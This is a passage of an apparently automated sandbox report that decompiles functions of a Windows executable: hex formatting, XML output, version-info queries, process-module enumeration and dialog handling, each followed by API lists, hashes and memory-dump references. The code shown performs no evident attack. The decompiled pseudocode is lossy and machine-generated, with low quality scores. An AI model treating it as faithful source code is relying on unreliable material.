                                                                                                                                                • Instruction ID: cbd8c252d2d2ef195a4c0e5b8e64ca40110f1bd057fda192b525793d095b5ed7
                                                                                                                                                • Opcode Fuzzy Hash: 2cd0e4f62e7c226bb1a7a6623729ec2332546ff41dbb1f6ce7e94b14287b325c
                                                                                                                                                • Instruction Fuzzy Hash: 57116072900209AFEB20AB90DD45EEF776CEB04314F104076FA05B6091E675AE49CAB9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00405D33, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 71%
                                                                                                                                                			E00405D33(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040DFD6();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                                                                                                0x00405d33
                                                                                                                                                0x00405d3c
                                                                                                                                                0x00405d53
                                                                                                                                                0x00405d58
                                                                                                                                                0x00405d5c
                                                                                                                                                0x00405d5f
                                                                                                                                                0x00405d61
                                                                                                                                                0x00405d68
                                                                                                                                                0x00405d69
                                                                                                                                                0x00405d74
                                                                                                                                                0x00405d79
                                                                                                                                                0x00405d7a
                                                                                                                                                0x00405d7f
                                                                                                                                                0x00405d84
                                                                                                                                                0x00405d8c
                                                                                                                                                0x00405d92
                                                                                                                                                0x00405d97
                                                                                                                                                0x00405d9b
                                                                                                                                                0x00405da1
                                                                                                                                                0x00405da9
                                                                                                                                                0x00405daf
                                                                                                                                                0x00405da1
                                                                                                                                                0x00405db8
                                                                                                                                                0x00405dbd
                                                                                                                                                0x00405dc5
                                                                                                                                                0x00405dcc

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                                                                                • String ID: %2.2X
                                                                                                                                                • API String ID: 2521778956-791839006
                                                                                                                                                • Opcode ID: 8d613fde9fab4d933d9f195fd49a4c987f01c631fdcf44825a32ae19885f2fe7
                                                                                                                                                • Instruction ID: cee391cc34d681d13bec3c3f8d39c8b6c523e2a4e61045ff621ae80f21b9d711
                                                                                                                                                • Opcode Fuzzy Hash: 8d613fde9fab4d933d9f195fd49a4c987f01c631fdcf44825a32ae19885f2fe7
                                                                                                                                                • Instruction Fuzzy Hash: 86012873E403196AE73067519C4ABBB33A8EF44714F10807BFC15F51C2EB7C99498A88
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004093B3, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 46%
                                                                                                                                                			E004093B3(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t27 = __ecx;
				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00408857(_t16, _t27);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E004086F5(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040DFD6();
				return E00408857(_t29, _t29, _a4,  &_v1028);
			}












                                                                                                                                                0x004093b3
                                                                                                                                                0x004093cf
                                                                                                                                                0x004093d1
                                                                                                                                                0x004093d8
                                                                                                                                                0x004093e6
                                                                                                                                                0x004093ed
                                                                                                                                                0x004093f8
                                                                                                                                                0x004093fa
                                                                                                                                                0x00409403
                                                                                                                                                0x004093fc
                                                                                                                                                0x004093fc
                                                                                                                                                0x004093fc
                                                                                                                                                0x0040940b
                                                                                                                                                0x00409414
                                                                                                                                                0x00409418
                                                                                                                                                0x0040941e
                                                                                                                                                0x00409425
                                                                                                                                                0x00409426
                                                                                                                                                0x00409431
                                                                                                                                                0x00409436
                                                                                                                                                0x00409437
                                                                                                                                                0x00409454

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • <?xml version="1.0" ?>, xrefs: 004093FC
                                                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00409403
                                                                                                                                                • <%s>, xrefs: 00409426
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_snwprintf
                                                                                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                • API String ID: 3473751417-2880344631
                                                                                                                                                • Opcode ID: cfaef87a50fb87b193c4db31b2271390d66c635945fe0e38d6c8237e7c0c562e
                                                                                                                                                • Instruction ID: 5b2b9264402656275e8c2dd0f1d17c7e9a998e95cf6bd8efe94fc2853a0f1184
                                                                                                                                                • Opcode Fuzzy Hash: cfaef87a50fb87b193c4db31b2271390d66c635945fe0e38d6c8237e7c0c562e
                                                                                                                                                • Instruction Fuzzy Hash: 57019BB2A001197AD720BA59CD41EAA766CEF44348F0040BBB60DF3192DB789E4586A9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040DDA7, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040DDA7(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E004055FF(0xff,  &_v1036, _v8);
				E004056C9(_t34, __esi);
				return 1;
			}








                                                                                                                                                0x0040ddbc
                                                                                                                                                0x0040ddcb
                                                                                                                                                0x0040dddc
                                                                                                                                                0x0040ddeb
                                                                                                                                                0x0040de0c
                                                                                                                                                0x00000000
                                                                                                                                                0x0040de30
                                                                                                                                                0x0040de17
                                                                                                                                                0x0040de1d
                                                                                                                                                0x0040de25
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • wcscpy.MSVCRT ref: 0040DDBC
                                                                                                                                                • wcscat.MSVCRT ref: 0040DDCB
                                                                                                                                                • wcscat.MSVCRT ref: 0040DDDC
                                                                                                                                                • wcscat.MSVCRT ref: 0040DDEB
                                                                                                                                                • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040DE05
                                                                                                                                                  • Part of subcall function 004055FF: wcslen.MSVCRT ref: 00405606
                                                                                                                                                  • Part of subcall function 004055FF: memcpy.MSVCRT ref: 0040561C
                                                                                                                                                  • Part of subcall function 004056C9: lstrcpyW.KERNEL32 ref: 004056DE
                                                                                                                                                  • Part of subcall function 004056C9: lstrlenW.KERNEL32(?), ref: 004056E5
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                • String ID: \StringFileInfo\
                                                                                                                                                • API String ID: 393120378-2245444037
                                                                                                                                                • Opcode ID: 7a910a675bd023779c6e6c6733b87f6ed7a0651bffc855d95701a4bfc6eddd32
                                                                                                                                                • Instruction ID: 65d82e6da75efbf52a81394e95eb84ccec4353c565c4c92e21fc1f2e9f7c11b1
                                                                                                                                                • Opcode Fuzzy Hash: 7a910a675bd023779c6e6c6733b87f6ed7a0651bffc855d95701a4bfc6eddd32
                                                                                                                                                • Instruction Fuzzy Hash: B701717290020DAACF10EAE1CC45EDF777D9B04304F0005B7B555F2092EA78EA999B58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00406CC6, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintfwcscpy
                                                                                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                • API String ID: 999028693-502967061
                                                                                                                                                • Opcode ID: dd6e75e1c219d61954c27f946452bcb1a006fb049640af874a458e11e3f78cea
                                                                                                                                                • Instruction ID: 89c1d54e0424cdf8955af57a35c4f81b258c2803f9b3bbee4052a97a94dd298f
                                                                                                                                                • Opcode Fuzzy Hash: dd6e75e1c219d61954c27f946452bcb1a006fb049640af874a458e11e3f78cea
                                                                                                                                                • Instruction Fuzzy Hash: 61E08672B8830131F93452452E03B2A2190EA94B18F724C7BF54BF05D2E6FD9874650F
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040CBD8, Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 38%
                                                                                                                                                			E0040CBD8(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t69;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;
				void* _t109;

				_t106 = _t105 & 0xfffffff8;
				E0040E340(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E0040591F() == 0) {
					L12:
					__eflags =  *0x41325c - _t98; // 0x0
					if(__eflags != 0) {
						_t89 = _a4;
						_t58 =  *0x4128dc(8, _t89);
						__eflags = _t58 - 0xffffffff;
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x4128d4(_t58,  &_a560);
							while(1) {
								__eflags = _t59;
								if(_t59 == 0) {
									goto L18;
								}
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								_t69 = E0040CDF8(_a8,  &_a8);
								__eflags = _t69;
								if(_t69 != 0) {
									_t59 =  *0x4128d0(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t109 =  *0x413260 - _t98; // 0x0
					if(_t109 == 0) {
						goto L12;
					} else {
						_t72 = OpenProcess(0x410, 0, _a4);
						_v0 = _t72;
						if(_t72 != 0) {
							_push( &_a4);
							_push(0x8000);
							_push( &_a2160);
							_push(_t72);
							if( *0x4128e0() != 0) {
								_t6 =  &_v12;
								 *_t6 = _v12 >> 2;
								_v8 = 1;
								_t90 = 0;
								if( *_t6 != 0) {
									while(1) {
										_a1616 = _t98;
										memset( &_a1618, _t98, 0x208);
										memset( &_a8, _t98, 0x21c);
										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
										_t106 = _t106 + 0x18;
										_a8 = _a4;
										_a12 = _t78;
										 *0x4128d8(_v16, _t78,  &_a1616, 0x104);
										E0040CAF2( &_v0,  &_a1600);
										_push(0xc);
										_push( &_v20);
										_push(_v4);
										_push(_v32);
										if( *0x4128e4() != 0) {
											_a508 = _v32;
											_a512 = _v36;
										}
										if(E0040CDF8(_a8,  &_v24) == 0) {
											goto L18;
										}
										_t90 = _t90 + 1;
										if(_t90 < _v44) {
											_t98 = 0;
											__eflags = 0;
											continue;
										} else {
										}
										goto L18;
									}
								}
							}
							L18:
							CloseHandle(_v16);
						}
					}
				}
				return _a8;
			}


























                                                                                                                                                0x0040cbdb
                                                                                                                                                0x0040cbe3
                                                                                                                                                0x0040cbeb
                                                                                                                                                0x0040cbed
                                                                                                                                                0x0040cbf8
                                                                                                                                                0x0040cd1b
                                                                                                                                                0x0040cd1b
                                                                                                                                                0x0040cd21
                                                                                                                                                0x0040cd27
                                                                                                                                                0x0040cd2d
                                                                                                                                                0x0040cd33
                                                                                                                                                0x0040cd36
                                                                                                                                                0x0040cd3a
                                                                                                                                                0x0040cd4e
                                                                                                                                                0x0040cd56
                                                                                                                                                0x0040cd5d
                                                                                                                                                0x0040cddf
                                                                                                                                                0x0040cddf
                                                                                                                                                0x0040cde1
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040cd70
                                                                                                                                                0x0040cd7c
                                                                                                                                                0x0040cd8d
                                                                                                                                                0x0040cd91
                                                                                                                                                0x0040cd9d
                                                                                                                                                0x0040cdab
                                                                                                                                                0x0040cdae
                                                                                                                                                0x0040cdbd
                                                                                                                                                0x0040cdc4
                                                                                                                                                0x0040cdc9
                                                                                                                                                0x0040cdcb
                                                                                                                                                0x0040cdd9
                                                                                                                                                0x00000000
                                                                                                                                                0x0040cdd9
                                                                                                                                                0x00000000
                                                                                                                                                0x0040cdcb
                                                                                                                                                0x00000000
                                                                                                                                                0x0040cddf
                                                                                                                                                0x0040cd3a
                                                                                                                                                0x0040cbfe
                                                                                                                                                0x0040cbfe
                                                                                                                                                0x0040cc04
                                                                                                                                                0x00000000
                                                                                                                                                0x0040cc0a
                                                                                                                                                0x0040cc13
                                                                                                                                                0x0040cc1b
                                                                                                                                                0x0040cc1f
                                                                                                                                                0x0040cc29
                                                                                                                                                0x0040cc2a
                                                                                                                                                0x0040cc36
                                                                                                                                                0x0040cc37
                                                                                                                                                0x0040cc40
                                                                                                                                                0x0040cc46
                                                                                                                                                0x0040cc46
                                                                                                                                                0x0040cc4b
                                                                                                                                                0x0040cc53
                                                                                                                                                0x0040cc55
                                                                                                                                                0x0040cc5f
                                                                                                                                                0x0040cc6d
                                                                                                                                                0x0040cc75
                                                                                                                                                0x0040cc85
                                                                                                                                                0x0040cc8d
                                                                                                                                                0x0040cc94
                                                                                                                                                0x0040cc9c
                                                                                                                                                0x0040ccad
                                                                                                                                                0x0040ccb1
                                                                                                                                                0x0040ccc2
                                                                                                                                                0x0040ccc7
                                                                                                                                                0x0040cccd
                                                                                                                                                0x0040ccce
                                                                                                                                                0x0040ccd2
                                                                                                                                                0x0040ccde
                                                                                                                                                0x0040cce4
                                                                                                                                                0x0040ccef
                                                                                                                                                0x0040ccef
                                                                                                                                                0x0040cd05
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040cd0b
                                                                                                                                                0x0040cd10
                                                                                                                                                0x0040cc5d
                                                                                                                                                0x0040cc5d
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040cd16
                                                                                                                                                0x00000000
                                                                                                                                                0x0040cd10
                                                                                                                                                0x0040cc5f
                                                                                                                                                0x0040cc55
                                                                                                                                                0x0040cde3
                                                                                                                                                0x0040cde7
                                                                                                                                                0x0040cde7
                                                                                                                                                0x0040cc1f
                                                                                                                                                0x0040cc04
                                                                                                                                                0x0040cdf7

                                                                                                                                                APIs
                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040C2CF,00000000,00000000), ref: 0040CC13
                                                                                                                                                • memset.MSVCRT ref: 0040CC75
                                                                                                                                                • memset.MSVCRT ref: 0040CC85
                                                                                                                                                  • Part of subcall function 0040CAF2: wcscpy.MSVCRT ref: 0040CB1B
                                                                                                                                                • memset.MSVCRT ref: 0040CD70
                                                                                                                                                • wcscpy.MSVCRT ref: 0040CD91
                                                                                                                                                • CloseHandle.KERNEL32(?,0040C2CF,?,?,?,0040C2CF,00000000,00000000), ref: 0040CDE7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3300951397-0
                                                                                                                                                • Opcode ID: 1fcad76c0bd3129941d7854f28fd29f69da4d45da8680cfa1fd3405ce168179b
                                                                                                                                                • Instruction ID: e16d66228f4dae7d6f5bcc77b9324eed5b76837c7fa80b75a9be3f82a58a018a
                                                                                                                                                • Opcode Fuzzy Hash: 1fcad76c0bd3129941d7854f28fd29f69da4d45da8680cfa1fd3405ce168179b
                                                                                                                                                • Instruction Fuzzy Hash: 93513C71108344EBD720EF65C884A9BBBE8FF84304F004A3EF589E6191DB75D945CB5A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004036F7, Relevance: 9.1, APIs: 6, Instructions: 106windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 90%
                                                                                                                                                			E004036F7(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				struct HWND__* _t29;
				intOrPtr* _t54;
				struct HWND__* _t61;
				struct HWND__* _t62;
				intOrPtr* _t66;
				void* _t67;
				intOrPtr* _t68;

				_t58 = __edx;
				_push(__ebx);
				_t66 = __ecx;
				E00401712( *((intOrPtr*)(__ecx + 0x10)), __edx, __ecx + 0x40, __eflags);
				_t61 = GetDlgItem( *(_t66 + 0x10), 0x40c);
				E00405700(_t61, E00406827(0x2ef), 1);
				E00405700(_t61, E00406827(0x2f0), 2);
				SendMessageW(_t61, 0x160, 0x15e, 0);
				_t62 = GetDlgItem( *(_t66 + 0x10), 0x40e);
				E00405700(_t62, E00406827(0x2f9), 1);
				E00405700(_t62, E00406827(0x2fa), 2);
				E00405700(_t62, E00406827(0x2fb), 3);
				E00405700(_t62, E00406827(0x2fc), 4);
				E00405700(_t62, E00406827(0x2fd), 5);
				SendMessageW(_t62, 0x160, 0x15e, 0);
				_t29 = GetDlgItem( *(_t66 + 0x10), 0x40f);
				_t63 = _t29;
				SendMessageW(_t29, 0x160, 0x15e, 0);
				E00405700(_t29, E00406827(0x30d), 1);
				E00405700(_t63, E00406827(0x30e), 2);
				_t54 = _t66;
				_pop(_t67);
				_t68 = _t54;
				 *((intOrPtr*)( *_t68 + 4))(1, _t67);
				 *((intOrPtr*)( *_t68 + 0x1c))();
				E00405B17(_t58,  *((intOrPtr*)(_t68 + 0x10)), 4);
				return 0;
			}










                                                                                                                                                0x004036f7
                                                                                                                                                0x004036f7
                                                                                                                                                0x004036fa
                                                                                                                                                0x00403703
                                                                                                                                                0x0040371f
                                                                                                                                                0x00403728
                                                                                                                                                0x0040373a
                                                                                                                                                0x0040374f
                                                                                                                                                0x00403766
                                                                                                                                                0x0040376f
                                                                                                                                                0x00403781
                                                                                                                                                0x00403797
                                                                                                                                                0x004037a9
                                                                                                                                                0x004037bf
                                                                                                                                                0x004037da
                                                                                                                                                0x004037e4
                                                                                                                                                0x004037e6
                                                                                                                                                0x004037f5
                                                                                                                                                0x00403805
                                                                                                                                                0x00403817
                                                                                                                                                0x00403820
                                                                                                                                                0x00403822
                                                                                                                                                0x0040165a
                                                                                                                                                0x00401660
                                                                                                                                                0x00401667
                                                                                                                                                0x0040166f
                                                                                                                                                0x00401679

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00401712: GetClientRect.USER32 ref: 0040171E
                                                                                                                                                  • Part of subcall function 00401712: GetWindow.USER32(?,00000005), ref: 00401737
                                                                                                                                                  • Part of subcall function 00401712: GetWindow.USER32(00000000), ref: 0040173A
                                                                                                                                                  • Part of subcall function 00401712: GetWindow.USER32(00000000,00000002), ref: 0040174C
                                                                                                                                                • GetDlgItem.USER32 ref: 00403716
                                                                                                                                                  • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                  • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                  • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                  • Part of subcall function 00405700: SendMessageW.USER32(?,00000143,00000000,?), ref: 00405717
                                                                                                                                                  • Part of subcall function 00405700: SendMessageW.USER32(?,00000151,00000000,?), ref: 00405729
                                                                                                                                                  • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                  • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                  • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040374F
                                                                                                                                                • GetDlgItem.USER32 ref: 0040375D
                                                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 004037DA
                                                                                                                                                • GetDlgItem.USER32 ref: 004037E4
                                                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 004037F5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$ItemWindow$HandleModule$ClientLoadRectStringmemcpywcscpywcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3030901043-0
                                                                                                                                                • Opcode ID: 1047b60b3950c8a152ac73b551837c30685554d49de1232bf18ecab51a8f137e
                                                                                                                                                • Instruction ID: 086a44b27e78f4b83ae4b6e77ae60044790fc96d4b444eb8a6a68cf3e2127a69
                                                                                                                                                • Opcode Fuzzy Hash: 1047b60b3950c8a152ac73b551837c30685554d49de1232bf18ecab51a8f137e
                                                                                                                                                • Instruction Fuzzy Hash: 9E21A3B6640700B7E11132625C87F3B26ACDB45B2DF42143EFB517A1C3D9BE5816256D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00401810, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 44%
                                                                                                                                                			E00401810(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                                                                                                0x0040181f
                                                                                                                                                0x00401836
                                                                                                                                                0x00401840
                                                                                                                                                0x00401848
                                                                                                                                                0x00401849
                                                                                                                                                0x0040184d
                                                                                                                                                0x00401852
                                                                                                                                                0x00401862
                                                                                                                                                0x00401878

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 19018683-0
                                                                                                                                                • Opcode ID: c8a69a874f342f7a3e97f07006a698148a3ee1bf1249d9731753e706e314068b
                                                                                                                                                • Instruction ID: 1a6c8e31efcae22bf085037e8d33cf81da157de282c50ef6ca12fa9021a14783
                                                                                                                                                • Opcode Fuzzy Hash: c8a69a874f342f7a3e97f07006a698148a3ee1bf1249d9731753e706e314068b
                                                                                                                                                • Instruction Fuzzy Hash: 7A01FF72900218EFDF14DFA4DD459FE7B79FB45301F000479EA11BA194DA71AA08CB50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040B659, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122windowkeyboardCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040B659(intOrPtr __ecx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void _v518;
				signed short _v520;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t46;
				void* _t64;
				intOrPtr* _t71;
				intOrPtr _t73;

				_t67 = __ecx;
				_t73 = __ecx;
				_t71 = _a8;
				_v8 = __ecx;
				if(_a4 == 0x101 &&  *((intOrPtr*)(_t71 + 8)) == 0xfffffffe &&  *((intOrPtr*)(_t71 + 0xc)) == 1) {
					_v520 = _v520 & 0x00000000;
					memset( &_v518, 0, 0x1fe);
					E00401000( &_v520, _t67, 0x41203c);
					_t46 = E00405CD2( *((intOrPtr*)(_t73 + 0x208)),  &_v520);
					_t71 = _a8;
				}
				if( *(_t71 + 4) == 0x103 &&  *((intOrPtr*)(_t71 + 8)) == 0xfffffff4) {
					_t46 = E00407DC0( *((intOrPtr*)(_t73 + 0x69c)), _t71);
					 *((intOrPtr*)(_t73 + 0x20c)) = 1;
					 *(_t73 + 0x210) = _t46;
				}
